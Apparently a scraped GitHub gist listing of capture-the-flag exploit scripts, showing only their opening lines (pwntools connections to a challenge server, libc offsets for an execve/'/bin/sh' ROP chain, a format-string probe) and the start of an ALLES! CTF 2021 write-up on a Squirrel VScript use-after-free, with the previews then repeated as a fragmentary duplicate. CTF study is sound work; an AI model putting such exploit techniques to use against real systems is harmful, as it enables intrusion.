Bien Pham kungfulon

## exp.c
#include <stdio.h>
#include <stdlib.h>
#include <stdarg.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/mman.h>

#define INFO "[*] "

## ex2.py
#!/usr/bin/env python3

import struct
import sys

libc = int(sys.argv[1], 16) - 0x270b3
setreuid = 0x117ab0
execve = 0xe62f0
binsh = 0x1b75aa
poprdx = 0x11c371

## exp.py
#!/usr/bin/env python3

from pwn import *

context.clear(arch='amd64', os='linux', endian='little')

r = remote('125.235.240.166', 33333)

# 1st boss
r.sendline(b'%p')

## exp.py
#!/usr/bin/env python3

from pwn import *

context.clear(arch='amd64', os='linux', endian='little')
libc = ELF('./libc-2.31.so')
MY_IP = b''

r = remote('125.235.240.166', 20120)

## csgo.md

      
              2 files
            
          
              0 forks
            
          
              0 comments
            
          
              4 stars
            
          
                kungfulon
                / csgo.md
            
            
              Created Sep 6, 2021
            
              
                ALLES! CTF 2021 - 🔥 Counter Strike: Squirrel Offensive
              
          
      View csgo.md
  
      
    🔥 Counter Strike: Squirrel Offensive
This challenge involves an old version of CS:GO VScript, which is vulnerable to a UAF bug and a type confusion bug.
UAF by resizing array in sort compare function
The sort function of squirrel array is array_sort in sqbaselib.cpp, which will call _qsort:
// v: VM, o: array object, func: compare func

  
## ex.py
#!/usr/bin/env python3

from pwn import *

context.os = 'linux'
context.arch = 'amd64'
context.terminal = ['tmux', 'new-window']

l = ELF('./libc-2.31.so')

## secret_keeper.py
#!/usr/bin/env python3

from pwn import *

context.os = 'linux'
context.arch = 'amd64'
context.terminal = ['tmux', 'sp', '-v', '-p', '90']

b = ELF('./secret_keeper')
l = ELF('/lib/x86_64-linux-gnu/libc-2.31.so')

## stage_1_2.py
#!/usr/bin/env python3

from pwn import *

context.os = 'linux'
context.arch = 'amd64'

b = ELF('./sandboxd')
l = ELF('./libc-2.31.so')
context.terminal = ['tmux', 'sp', '-h', '-p', '80']

## rps.py
#!/usr/bin/env python3

from pwn import *
import ctypes

context.os = 'linux'
context.arch = 'amd64'

LIBC = ctypes.cdll.LoadLibrary('/lib/x86_64-linux-gnu/libc-2.27.so')

## hash.cpp
class Hash {
public:
    Hash(const std::string &s) : hash1(s.size() + 1), hash2(s.size() + 1) {
        if (base == -1) {
            base = genBase(minBase, mod);
            pow1.push_back(1);
            pow2.push_back(1);
        }

        while (pow1.size() <= s.size()) {
	#include <stdio.h>
	#include <stdlib.h>
	#include <stdarg.h>
	#include <string.h>
	#include <fcntl.h>
	#include <unistd.h>
	#include <sys/mman.h>

	#define INFO "[*] "
	#!/usr/bin/env python3

	import struct
	import sys

	libc = int(sys.argv[1], 16) - 0x270b3
	setreuid = 0x117ab0
	execve = 0xe62f0
	binsh = 0x1b75aa
	poprdx = 0x11c371
	#!/usr/bin/env python3

	from pwn import *

	context.clear(arch='amd64', os='linux', endian='little')

	r = remote('125.235.240.166', 33333)

	# 1st boss
	r.sendline(b'%p')
	#!/usr/bin/env python3

	from pwn import *

	context.os = 'linux'
	context.arch = 'amd64'
	context.terminal = ['tmux', 'new-window']

	l = ELF('./libc-2.31.so')
	#!/usr/bin/env python3

	from pwn import *
	import ctypes

	context.os = 'linux'
	context.arch = 'amd64'

	LIBC = ctypes.cdll.LoadLibrary('/lib/x86_64-linux-gnu/libc-2.27.so')
	class Hash {
	public:
	Hash(const std::string &s) : hash1(s.size() + 1), hash2(s.size() + 1) {
	if (base == -1) {
	base = genBase(minBase, mod);
	pow1.push_back(1);
	pow2.push_back(1);
	}

	while (pow1.size() <= s.size()) {